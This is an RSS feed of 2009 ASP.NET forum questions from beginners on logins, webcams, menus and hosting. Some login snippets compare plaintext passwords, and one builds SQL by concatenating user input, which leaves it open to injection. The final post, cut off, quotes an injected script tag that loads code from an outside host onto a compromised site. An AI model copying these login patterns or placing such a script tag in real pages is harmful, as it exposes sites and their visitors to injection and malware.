<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
  <channel>
    <title>ASP.NET Forum RSS Feed</title>
    <link>http://www.programmersheaven.com/</link>
    <description>Contains the latest threads from the 'ASP.NET' forum at Programmer's Heaven, excluding replies.</description>
    <language>en</language>
    <copyright>Copyright 2009 Programmers Heaven</copyright>
    <pubDate>Fri, 20 Nov 2009 20:26:17 -0700</pubDate>
    <lastBuildDate>Fri, 20 Nov 2009 20:26:17 -0700</lastBuildDate>
    <generator>Argotic Syndication Framework 2007.3.0.1, http://www.codeplex.com/Argotic</generator>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <ttl>360</ttl>
    <image>
      <url>http://www.programmersheaven.com/images/ph.gif</url>
      <title>Programmers Heaven</title>
      <link>http://www.programmersheaven.com/</link>
      <width>88</width>
      <height>31</height>
    </image>
    <item>
      <title>Image capturing in ASP.NET 3.5 using Webcam</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/409618/409618/image-capturing-in-aspnet-35-using-webcam/</link>
      <description>Hi,&lt;br /&gt;
&lt;br /&gt;
I would like to capture the image using WebCam and store it in database. I am using ASP.NET 3.5, C#, Visual Studio 2008, SQL Server 2008, Windows Vista Business (O.S), IIS 7.0 and IE 7.0. I want to integrate WebCam functionality in my Web Application. My requirement is, the end user can view the image (i.e., preview from the WebCam)  in the Web page using ActiveX Control (in my case videocapx.ocx is the ActiveX Control). And on clik of "Capture" button, the image has to be capture and stored in database. For this I have installed "VideoCapX" software. I am using "ZEBRONICS" WebCam to capture images. Its model number is "Eagle's eye ZEB-480WC". How can I integrate "videocapx.ocx ActiveX Control" in my web page, so that end user can preview the image. &lt;br /&gt;
&lt;br /&gt;
Please help me out. It is very urgent. Thanks inadvnce.&lt;br /&gt;
&lt;br /&gt;
OR&lt;br /&gt;
&lt;br /&gt;
Is there any way to capture image using webcam @ client side.&lt;br /&gt;
In my case both Client &amp;amp; Server are same.&lt;br /&gt;
How can I acheive this.&lt;br /&gt;
If it is possible using some other way, please give your suggestions.&lt;br /&gt;
&lt;br /&gt;
Thanks &amp;amp; Regards,&lt;br /&gt;
VKK Reddy. &lt;br /&gt;
&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/409618/409618/image-capturing-in-aspnet-35-using-webcam/</guid>
      <pubDate>Thu, 19 Nov 2009 23:01:43 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Creating menu for a ASP.Net application</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/409391/409391/creating-menu-for-a-aspnet-application/</link>
      <description>Hi, &lt;br /&gt;
&lt;br /&gt;
I am creating an ASP.Net application in VS2008. I would like to create a horizontal menu bar at the top. The values of this menu bar should be dynamic. By dynamic i mean that we should be able to add new values or remove the existing values from the menu bar.&lt;br /&gt;
&lt;br /&gt;
Any suggestions as to how can we implement this? Any small code snippet is welcome.&lt;br /&gt;
&lt;br /&gt;
Thanks in advance. &lt;br /&gt;
&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/409391/409391/creating-menu-for-a-aspnet-application/</guid>
      <pubDate>Mon, 16 Nov 2009 11:21:11 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Login as different user</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/409347/409347/login-as-different-user/</link>
      <description>Hi everybody,&lt;br /&gt;
&lt;br /&gt;
My request out here is Urgent, though i have passed through what I could access in this forum and others also, but cannot finding a working solution.&lt;br /&gt;
&lt;br /&gt;
I have designed an ASP.NET application, at our organizational intranet, I have used Windows Authentication and it worked very efficiently. My problem is, I want my application to ask for re-entering of employee's credential when he clicked on a log out control ( it could be anything - i didn't decided what will trigger log out yet ). I want it to be like Sharepoint page where you can log as another user in the same machine.&lt;br /&gt;
&lt;br /&gt;
I m using following code but not working properly.&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="sourcecode"&gt;
protected void Page_Load(object sender, EventArgs e)
    {
        if (!this.IsPostBack)
        {
            _User = User.Identity.Name.Replace("Domain\\", "");
            Label1.Text = _User;
        }
    }
    protected void LinkButton1_Click(object sender, EventArgs e)
    {
       
            Response.StatusCode = 401;
            Response.StatusDescription = "Unauthorized";
            Response.End();
            Response.Redirect("Default.aspx");       
    }
&lt;/pre&gt;&lt;br /&gt;
and my HTML or aspx CODE IS&lt;br /&gt;
&lt;pre class="sourcecode"&gt;
&amp;lt;head runat="server"&amp;gt;
    &amp;lt;title&amp;gt;Untitled Page&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;form id="form1" runat="server"&amp;gt;
    &amp;lt;div&amp;gt;
        &amp;lt;p&amp;gt;Hello &amp;lt;asp:Label ID="Label1" runat="server" Text="Label"&amp;gt;&amp;lt;/asp:Label&amp;gt;&amp;lt;/p&amp;gt;
        &amp;lt;asp:LinkButton ID="LinkButton1" runat="server" onclick="LinkButton1_Click"&amp;gt;Sign in as Different user&amp;lt;/asp:LinkButton&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;/form&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/pre&gt;&lt;br /&gt;
I am waiting ...&lt;br /&gt;
&lt;br /&gt;
Thanks.&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/409347/409347/login-as-different-user/</guid>
      <pubDate>Mon, 16 Nov 2009 00:48:58 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>URGENT   Login Page-</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/409344/409344/urgent---login-page-/</link>
      <description>&lt;br /&gt;
I HAVE TWO FIELDS IN THE DATABASE TABLE USERNAME AND PASSWORD .&amp;amp; AND THE TWO FIELDS CONTAINING TWO VALUES&lt;br /&gt;
. NAME,123&lt;br /&gt;
.ADMIN ,123&lt;br /&gt;
BUT DURING THE EXECUTION  FOR(NAME,123)IT IS GIVING CORRECT RESULT.&lt;br /&gt;
FOR(ADMIN,123)IT IS GIVING LOGIN FAILURE.WHY???&lt;br /&gt;
&lt;br /&gt;
Sub validate_click(ByVal s As Object, ByVal e As EventArgs)&lt;br /&gt;
            Dim con1 As SqlConnection&lt;br /&gt;
            Dim cmd As SqlCommand&lt;br /&gt;
            con1 = New SqlConnection("Data Source=YOUR-41B8D18EDE;Initial Catalog=employee;Integrated Security=True")&lt;br /&gt;
            con1.Open()&lt;br /&gt;
            cmd = New SqlCommand("select  * from logintable ", con1)&lt;br /&gt;
            Dim dr As SqlDataReader&lt;br /&gt;
            dr = cmd.ExecuteReader()&lt;br /&gt;
            If dr.Read() Then&lt;br /&gt;
                If (txtUserName.Text = dr("username") And txtPassword.Text = dr("password")).ToString Then&lt;br /&gt;
                    Label1.Text = "login success"&lt;br /&gt;
                    &lt;br /&gt;
                Else&lt;br /&gt;
                    &lt;br /&gt;
                    Label1.Text = "login failure"&lt;br /&gt;
                End If&lt;br /&gt;
            &lt;br /&gt;
            End If&lt;br /&gt;
                  &lt;br /&gt;
                &lt;br /&gt;
           &lt;br /&gt;
        End Sub&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/409344/409344/urgent---login-page-/</guid>
      <pubDate>Mon, 16 Nov 2009 00:04:28 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Automatic generation of textboxes during text changed event</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/409325/409325/automatic-generation-of-textboxes-during-text-changed-event/</link>
      <description>i already have one textbox.During the text changed event i want to generate three more textboxes.for me it is not working.only textbox4 is creating.why??                &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 Sub textbox1_textchanged(ByVal sender As Object, ByVal e As System.EventArgs)&lt;br /&gt;
           &lt;br /&gt;
            Dim count As Integer&lt;br /&gt;
            Dim t As New TextBox&lt;br /&gt;
            For count = 2 To 4&lt;br /&gt;
                              t.Text = "TextBox" &amp;amp; count.ToString()&lt;br /&gt;
                t.ID = "TextBox" &amp;amp; count.ToString()&lt;br /&gt;
                &lt;br /&gt;
            &lt;br /&gt;
                Panel1.Controls.Add(t)&lt;br /&gt;
                &lt;br /&gt;
                Panel1.Controls.Add(New LiteralControl("&amp;lt;br&amp;gt;"))&lt;br /&gt;
            &lt;br /&gt;
                MsgBox("vbbvbnv")&lt;br /&gt;
            Next count&lt;br /&gt;
endsub&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/409325/409325/automatic-generation-of-textboxes-during-text-changed-event/</guid>
      <pubDate>Sun, 15 Nov 2009 12:36:28 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>save .aspx page as .html file</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/408979/408979/save-aspx-page-as-html-file/</link>
      <description>i have looked and looked for this and so far all the code i've downloaded simply doesnt work.&lt;br /&gt;
this code (below) works fine - however it opens up the "save file Dialog" and  requires that the user select the path to save the .html file.&lt;br /&gt;
how can i by-pass that and save the file myself to say - a virtual directory?&lt;br /&gt;
any help is greatly appreciated&lt;br /&gt;
thanks&lt;br /&gt;
rik&lt;br /&gt;
&lt;br /&gt;
Response.Clear()&lt;br /&gt;
            Response.Buffer = True&lt;br /&gt;
            Response.ContentType = "application/html"&lt;br /&gt;
            Response.ContentEncoding = System.Text.Encoding.UTF8&lt;br /&gt;
            Response.AddHeader("Content-Disposition", "attachment;filename=Test.html")&lt;br /&gt;
            Response.Charset = ""&lt;br /&gt;
            EnableViewState = False&lt;br /&gt;
            Dim oStringWriter As System.IO.StringWriter = New System.IO.StringWriter&lt;br /&gt;
            Dim oHtmlTextWriter As System.Web.UI.HtmlTextWriter = New System.Web.UI.HtmlTextWriter(oStringWriter)&lt;br /&gt;
            pnMyPanel.RenderControl(oHtmlTextWriter)&lt;br /&gt;
            Response.Write(oHtmlTextWriter.ToString())&lt;br /&gt;
            Response.Close()</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/408979/408979/save-aspx-page-as-html-file/</guid>
      <pubDate>Mon, 09 Nov 2009 10:26:18 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>test asp.net for cross browser compatibility</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/408910/408910/test-aspnet-for-cross-browser-compatibility/</link>
      <description>Hi experts....&lt;br /&gt;
i want to know .. is there any tool that allows me to test my website on IE,firefox,safari,opera&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/408910/408910/test-aspnet-for-cross-browser-compatibility/</guid>
      <pubDate>Fri, 06 Nov 2009 02:55:34 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Need help in Login Page</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/408733/408733/need-help-in-login-page/</link>
      <description>There are errors which kept appearing which I cannot debug:&lt;br /&gt;
&lt;br /&gt;
All my textboxes and buttons does not exist in the current context:	&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
using System;&lt;br /&gt;
using System.Data;&lt;br /&gt;
using System.Configuration;&lt;br /&gt;
using System.Web;&lt;br /&gt;
using System.Web.Security;&lt;br /&gt;
using System.Web.UI;&lt;br /&gt;
using System.Web.UI.WebControls;&lt;br /&gt;
using System.Web.UI.WebControls.WebParts;&lt;br /&gt;
using System.Web.UI.HtmlControls;&lt;br /&gt;
using System.Data.OleDb;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
public partial class _Default : System.Web.UI.Page&lt;br /&gt;
{&lt;br /&gt;
    DBConnect Connect = new DBConnect();&lt;br /&gt;
    protected void Page_Load(object sender, EventArgs e)&lt;br /&gt;
    {&lt;br /&gt;
        &lt;br /&gt;
        if ((string)Session["sFlag"] == "T")&lt;br /&gt;
            &lt;br /&gt;
        {&lt;br /&gt;
              &lt;br /&gt;
            LoggedIn();&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
        }&lt;br /&gt;
        else&lt;br /&gt;
        {&lt;br /&gt;
            Session["sName"] = null;&lt;br /&gt;
            Session["sUserName"] = null;&lt;br /&gt;
            Session["sAddress"] = null;&lt;br /&gt;
            Session["sCoContact"] = null;&lt;br /&gt;
            Session["sPIC"] = null;&lt;br /&gt;
            Session["sPICContact"] = null;&lt;br /&gt;
            Session["sFlag"] = "F";&lt;br /&gt;
            passwordTB.Visible = true;&lt;br /&gt;
            passwordTB.Text = "";&lt;br /&gt;
            usernameTB.Visible = true;&lt;br /&gt;
            usernameTB.Text = "";&lt;br /&gt;
            usernameTB.Text = "UserID:";&lt;br /&gt;
            LogoutBT.Visible = false;&lt;br /&gt;
            LoginBT.Visible = true;&lt;br /&gt;
           &lt;br /&gt;
       &lt;br /&gt;
}&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    protected void LoginBT_Click(object sender, EventArgs e)&lt;br /&gt;
    {&lt;br /&gt;
        if (usernameTB.Text != "")&lt;br /&gt;
        {&lt;br /&gt;
            if (passwordTB.Text != "")&lt;br /&gt;
            {&lt;br /&gt;
                OleDbConnection mdb = new OleDbConnection();&lt;br /&gt;
                OleDbCommand cmd;&lt;br /&gt;
                OleDbDataReader rdr;&lt;br /&gt;
                Connect.DBConnection(mdb);&lt;br /&gt;
                mdb.Open();&lt;br /&gt;
                string SQLinfo = "SELECT * FROM Customers WHERE cUserName = '" +&lt;br /&gt;
                    usernameTB.Text.ToUpper() + "'";&lt;br /&gt;
                string SQLlog = "INSERT INTO Log (lName,lLogIn) " +&lt;br /&gt;
                "VALUES (@UserName, @Date)";&lt;br /&gt;
                cmd = new OleDbCommand(SQLinfo, mdb);&lt;br /&gt;
                rdr = cmd.ExecuteReader();&lt;br /&gt;
                while (rdr.Read())&lt;br /&gt;
                {&lt;br /&gt;
                    if (passwordTB.Text == (string)rdr["cPassword"])&lt;br /&gt;
                    {&lt;br /&gt;
                        Session["sName"] = rdr["cName"];&lt;br /&gt;
                        Session["sUserName"] = rdr["cUserName"];&lt;br /&gt;
                        Session["sAddress"] = rdr["cCoAddress"];&lt;br /&gt;
                        Session["sCoContact"] = rdr["cCoContact"];&lt;br /&gt;
                        Session["sPIC"] = rdr["cPersonInCharge"];&lt;br /&gt;
                        Session["sPICContact"] = rdr["cPICContact"];&lt;br /&gt;
                        Session["sEmail"] = rdr["cEmail"];&lt;br /&gt;
                        Session["sStatus"] = rdr["cStatus"];&lt;br /&gt;
                        Session["sFlag"] = "T";&lt;br /&gt;
                        rdr.Close();&lt;br /&gt;
                        cmd = new OleDbCommand(SQLlog, mdb);&lt;br /&gt;
                        cmd.Parameters.Add("@UserName", OleDbType.Char).Value = (string)Session["sCoName"];&lt;br /&gt;
                        cmd.Parameters.Add("@Date", OleDbType.Date).Value = DateTime.Now;&lt;br /&gt;
                        cmd.ExecuteNonQuery();&lt;br /&gt;
                        mdb.Close();&lt;br /&gt;
                        LoggedIn();&lt;br /&gt;
                        break;&lt;br /&gt;
                    }&lt;br /&gt;
                    else&lt;br /&gt;
                    {&lt;br /&gt;
                        rdr.Close();&lt;br /&gt;
                        mdb.Close();&lt;br /&gt;
                        usernameTB.Text = "";&lt;br /&gt;
                        passwordTB.Text = "";&lt;br /&gt;
                        Response.Write("&amp;lt;script&amp;gt;alert('Error signing in')&amp;lt;/script&amp;gt;");&lt;br /&gt;
                        break;&lt;br /&gt;
                    }&lt;br /&gt;
                }&lt;br /&gt;
                mdb.Close();&lt;br /&gt;
            }&lt;br /&gt;
            else&lt;br /&gt;
            {&lt;br /&gt;
                passwordTB.Focus();&lt;br /&gt;
                Response.Write("&amp;lt;script&amp;gt;alert('Please enter your password')&amp;lt;/script&amp;gt;");&lt;br /&gt;
            }&lt;br /&gt;
        }&lt;br /&gt;
        else&lt;br /&gt;
        {&lt;br /&gt;
            usernameTB.Focus();&lt;br /&gt;
            Response.Write("&amp;lt;script&amp;gt;alert('Please enter your UserID')&amp;lt;/script&amp;gt;");&lt;br /&gt;
        }&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    protected void LogoutBT_Click(object sender, EventArgs e)&lt;br /&gt;
    {&lt;br /&gt;
        OleDbConnection mdb = new OleDbConnection();&lt;br /&gt;
        OleDbCommand cmd;&lt;br /&gt;
        Connect.DBConnection(mdb);&lt;br /&gt;
        string SQLlog = "UPDATE Log SET lLogOut = @Date WHERE lCoName = @Name";&lt;br /&gt;
        cmd = new OleDbCommand(SQLlog, mdb);&lt;br /&gt;
        cmd.Parameters.Add("@Date", OleDbType.Date).Value = DateTime.Now;&lt;br /&gt;
        cmd.Parameters.Add("@Name", OleDbType.Char).Value = (string)Session["sUserName"];&lt;br /&gt;
        mdb.Open();&lt;br /&gt;
        cmd.ExecuteNonQuery();&lt;br /&gt;
        mdb.Close();&lt;br /&gt;
        LoggedOut();&lt;br /&gt;
    }&lt;br /&gt;
    protected void LoggedOut()&lt;br /&gt;
    {&lt;br /&gt;
        Session["sName"] = null;&lt;br /&gt;
        Session["sUserName"] = null;&lt;br /&gt;
        Session["sAddress"] = null;&lt;br /&gt;
        Session["sCoContact"] = null;&lt;br /&gt;
        Session["sPIC"] = null;&lt;br /&gt;
        Session["sPICContact"] = null;&lt;br /&gt;
        Session["sFlag"] = "F";&lt;br /&gt;
        passwordTB.Visible = true;&lt;br /&gt;
        passwordTB.Text = "";&lt;br /&gt;
        usernameTB.Visible = true;&lt;br /&gt;
        usernameTB.Text = "";&lt;br /&gt;
        usernameTB.Text = "UserID:";&lt;br /&gt;
        LogoutBT.Visible = false;&lt;br /&gt;
        LoginBT.Visible = true;&lt;br /&gt;
        Response.Redirect("OnlineRVform.aspx");&lt;br /&gt;
    }&lt;br /&gt;
    protected void LoggedIn()&lt;br /&gt;
    {&lt;br /&gt;
        passwordTB.Visible = false;&lt;br /&gt;
        passwordTB.Text = "";&lt;br /&gt;
        usernameTB.Visible = false;&lt;br /&gt;
        usernameTB.Text = "";&lt;br /&gt;
        usernameTB.Text = (string)Session["sPIC"];&lt;br /&gt;
        LogoutBT.Visible = true;&lt;br /&gt;
        LoginBT.Visible = false;&lt;br /&gt;
&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Please help me. Thank you so much.&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/408733/408733/need-help-in-login-page/</guid>
      <pubDate>Mon, 02 Nov 2009 21:02:32 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Automatic Email Notifications</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/408657/408657/automatic-email-notifications/</link>
      <description>Hello,&lt;br /&gt;
&lt;br /&gt;
I wrote an asp.net program that is designed to retrieve user data. The process, in which the user can log in to the system and input his data, has a Start Date and an End Date where the user is not allowed to log in before the start date or after the end date.&lt;br /&gt;
&lt;br /&gt;
I want to send an email notification to the users to log in to the system and input their data. This email notification has to be sent on the Start Date of the process (which is stored in an a database table). Additionally, two reminder emails must be sent to the users of the system. The time of sending the email reminder will be calculated automatically by generating two dates between the Start Date and End Date of the process.&lt;br /&gt;
&lt;br /&gt;
The problem I am facing at the moment is how to send the email notification automatically. I wrote the procedure for sending the email notification and I stored it in an asp.net web service. But how can I trigger this procedure on Start Date and on each Reminder Date?&lt;br /&gt;
&lt;br /&gt;
I tried several methods and thought of using timers but to no avail.&lt;br /&gt;
&lt;br /&gt;
Appreciate your help,&lt;br /&gt;
shaknon&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/408657/408657/automatic-email-notifications/</guid>
      <pubDate>Sun, 01 Nov 2009 00:54:55 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Can't Recompile My Website</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/408615/408615/cant-recompile-my-website/</link>
      <description>I'm a first time hoster (seekdotnet), so I apologize for the novice question. When I'm working on my local computer, everything is fine, but I'm just having a problem on the hosting server.  &lt;br /&gt;
&lt;br /&gt;
I use FileZilla to edit my website. When I edit the main page (.aspx), the system automatically recompiles the changes and everything works fine. However, when I make changes to the CodeBehind page (.aspx.vb), the website doesn't recongize the changes...&lt;br /&gt;
&lt;br /&gt;
I've tried making the changes on my local computer, Build Solution, and everything works.  I then delete the web page off the server and upload the new page... but still no changes...  I've tried deleting all the files off the sever and uploading everything again, but then I run into a problem where the website is looking for files off the localhost, instead of the server... I had to pay someone $150 originally because I couldn't figure out why the website kept looking for localhost instead of the server.   I'm hoping I can learn the cause of this instead of hiring someone again.  &lt;br /&gt;
&lt;br /&gt;
I just need to know the easiest way to recompile the changes I make to the codebehind page.  Do i need to recompile/reupload the whole site? just the one page that I made changes to?  is it something in the global.asax/assembly/web.config that i need to recompile???&lt;br /&gt;
&lt;br /&gt;
Thank you so much to all who answers!!!&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/408615/408615/cant-recompile-my-website/</guid>
      <pubDate>Fri, 30 Oct 2009 23:48:09 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Processing power</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/408514/408514/processing-power/</link>
      <description>Hi there&lt;br /&gt;
&lt;br /&gt;
There are three functional requirements that we have put forward to our developers, to check when a windows service is running. &lt;br /&gt;
There was one, that involved file swapping.. and re-naming of files.. which sounded obscure from the start.&lt;br /&gt;
 &lt;br /&gt;
Could anyone tell me the complications, based on cpu processing power.. with file swapping/renaming files? Like the service would have been checked to see if it's running everytime, how much processing power would this take on a ASP.net application? Also file-integrity issues?&lt;br /&gt;
&lt;br /&gt;
There is a better solution, which developers are more interested in whereby a flag is set in the database when the service is running and on Page_load, it will check to see if this flag has been set. If set, then user will be redirected to 'downtime page', else it will continue onto logon page.&lt;br /&gt;
&lt;br /&gt;
Any resources to help me on this would be great. Or if I could get chatting briefly about this, that would be even better.&lt;br /&gt;
&lt;br /&gt;
Thanks in advance. &lt;br /&gt;
Laura&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/408514/408514/processing-power/</guid>
      <pubDate>Wed, 28 Oct 2009 22:19:17 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Performance metric tools</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/408512/408512/performance-metric-tools/</link>
      <description>&lt;br /&gt;
&lt;br /&gt;
Hi everyone, &lt;br /&gt;
&lt;br /&gt;
I've posted this same message in the 'Getting started' forum, but I think it's a little more advanced than that so I'm placing it here in C#.&lt;br /&gt;
&lt;br /&gt;
I'm looking for some assistance on Performance metric tools for an ASP.NET application, written in C#. &lt;br /&gt;
&lt;br /&gt;
Also, these stats must be displayed on the Administration section of the site. &lt;br /&gt;
&lt;br /&gt;
I'm looking for information on how to capture aswell as output the following information:&lt;br /&gt;
&lt;br /&gt;
– How many users on the system when the measures were taken, what pages were the measures taken against. In addition, there should be a break down by page type, for example, how long to login.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Baseline to put the stats into context:&lt;br /&gt;
&lt;br /&gt;
How many users on the system:&lt;br /&gt;
&lt;br /&gt;
Time of day&lt;br /&gt;
&lt;br /&gt;
Date&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
Then specific stats on:&lt;br /&gt;
&lt;br /&gt;
Page types (does not mean each page, but section of activity like logging on, submission of questionnaire, help retrieval etc)&lt;br /&gt;
&lt;br /&gt;
Speed of request fulfilment, + average + long + wait time&lt;br /&gt;
&lt;br /&gt;
Would Google Analytics could be used here? &lt;br /&gt;
&lt;br /&gt;
Thanks in advance for any help you can offer.&lt;br /&gt;
&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/408512/408512/performance-metric-tools/</guid>
      <pubDate>Wed, 28 Oct 2009 22:11:36 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>How to include System.Core.dll (.net 3.5) to a .net 2.0 application</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/408335/408335/how-to-include-systemcoredll-net-35-to-a-net-20-application/</link>
      <description>My project is in .net framwork 2.0 and i want to use TimezoneInfo class.&lt;br /&gt;
When i use the below line..it is giving an error like&lt;br /&gt;
 " Type TimezoneInfo is not defined"&lt;br /&gt;
&lt;br /&gt;
Dim zones As ReadOnlyCollection(Of TimeZoneInfo) = TimeZoneInfo.GetSystemTimeZones()&lt;br /&gt;
&lt;br /&gt;
Actually my requirement is to get all the timezones and functions for getting time by timezoneId.&lt;br /&gt;
&lt;br /&gt;
How can i use  the TimezoneInfo class in .Net 2.0 Application?&lt;br /&gt;
&lt;br /&gt;
Thank you&lt;br /&gt;
Dilip.&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/408335/408335/how-to-include-systemcoredll-net-35-to-a-net-20-application/</guid>
      <pubDate>Mon, 26 Oct 2009 03:42:34 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Client CPU goes up while browsing asp.net page for long time</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/408322/408322/client-cpu-goes-up-while-browsing-aspnet-page-for-long-time/</link>
      <description>My application is developed by asp.net with c#, measurement studio, ajax. Every second it has to read some variables (around 100)and write also when you command to write. While browser (IE7) is kept for long opening the page, the client cpu goes up (around 50%) and it occurs slow response. Even the scroll does not work properly.&lt;br /&gt;
&lt;br /&gt;
Any solution?&lt;br /&gt;
&lt;br /&gt;
thanks,&lt;br /&gt;
Mamun&lt;br /&gt;
&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/408322/408322/client-cpu-goes-up-while-browsing-aspnet-page-for-long-time/</guid>
      <pubDate>Sun, 25 Oct 2009 23:50:55 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>how to change Integer to string?</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/408080/408080/how-to-change-integer-to-string/</link>
      <description>thanks very much&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/408080/408080/how-to-change-integer-to-string/</guid>
      <pubDate>Thu, 22 Oct 2009 02:11:35 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Trouble with ASP.NET on Vista IIS.</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/408037/408037/trouble-with-aspnet-on-vista-iis/</link>
      <description>I have installed Microsoft Visual Studio 2008 , trial version and I am running it on VISTA SP1. The IIS server is up and running: I am able&lt;br /&gt;
to run .php files and .asp files.&lt;br /&gt;
&lt;br /&gt;
In the C# tab , I am choosing File-&amp;gt;New -&amp;gt; Project -&amp;gt; .NET Web Application.&lt;br /&gt;
&lt;br /&gt;
As I run a standard empty project, the result should be a blank page , but I receive in my browser the following error: Connection Timeout, Firefox cannot establish a connection with the server localhost:port.&lt;br /&gt;
It appears that Microsoft Visual Studio cannot find the page, named default.aspx.&lt;br /&gt;
&lt;br /&gt;
I tried manualy writing default.aspx in the browser address tab , but it gives me the same error.&lt;br /&gt;
&lt;br /&gt;
I have checked in Programs and Features and the .NET Framework is installed.&lt;br /&gt;
&lt;br /&gt;
What can I do to make the website work through .NET? &lt;br /&gt;
I will check any comments from you and give you the insight about any details concerning my system.&lt;br /&gt;
&lt;br /&gt;
I am in college and I just started a course on programming in ASP.NET so I urgently need yo make it running.&lt;br /&gt;
Thank you in advance!&lt;br /&gt;
&lt;br /&gt;
Adi&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/408037/408037/trouble-with-aspnet-on-vista-iis/</guid>
      <pubDate>Wed, 21 Oct 2009 07:42:13 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Help!  Creating an online test</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/407935/407935/help--creating-an-online-test/</link>
      <description>I'm trying to create an online test and I am not very familiar with the radiobuttonlist control.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I have 3 classes..cTest, cQuestion, cAnswer...within cTest I have a generic list of cQuestions, within cQuestion, a generic list of cAnswers.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
So my thought was that I could use foreach to display the questions and answers...which worked...however, I'm not sure how to retrieve the selected answers when the user clicks submit.  Any ideas?&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Also, is this the best way to do things?  I like the idea of using generic lists, however would it be better to use DataSets and bind them to the RadioButtonLists? &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Any help appreciated&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Thanks</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/407935/407935/help--creating-an-online-test/</guid>
      <pubDate>Sat, 17 Oct 2009 08:20:06 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>PROBLEM: code getting attached to asp.net pages automatically</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/407258/407258/problem-code-getting-attached-to-aspnet-pages-automatically/</link>
      <description>sir,&lt;br /&gt;
i am new to asp.net , just completed one project which was hosted,&lt;br /&gt;
but recently the website had a problem&lt;br /&gt;
this code&lt;br /&gt;
"&lt;br /&gt;
&amp;lt;script src=http://anydisk.anyprinting.com/webfolder/index.php &amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
